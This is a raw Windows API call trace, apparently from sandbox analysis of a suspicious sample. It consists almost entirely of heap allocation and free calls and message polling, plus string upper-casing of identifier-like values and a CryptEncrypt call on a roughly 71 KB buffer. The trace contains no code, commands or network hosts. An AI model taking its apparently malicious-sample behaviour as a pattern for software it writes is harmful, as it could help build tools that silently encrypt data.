HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0207.983] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0207.983] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0207.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0207.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0207.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0207.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0207.984] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0207.984] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0207.984] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0207.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaad68 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74040 [0207.984] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0207.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0207.985] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0207.985] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0207.985] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0207.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0207.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0207.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0207.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.986] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74040 | out: hHeap=0x2af0000) returned 1 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0207.986] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0207.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0207.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0207.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0207.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0207.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0207.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0207.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0207.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0207.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0207.987] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae28 [0207.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0207.987] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0207.987] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0207.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.988] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0207.988] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d1658 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0207.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0207.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0207.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0207.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaaf60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0207.991] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11605, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x11608) returned 1 [0207.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.992] CharLowerBuffW (in: lpsz="byte[71176]", cchLength=0xb | out: lpsz="byte[71176]") returned 0xb [0207.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.994] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.994] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.994] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd 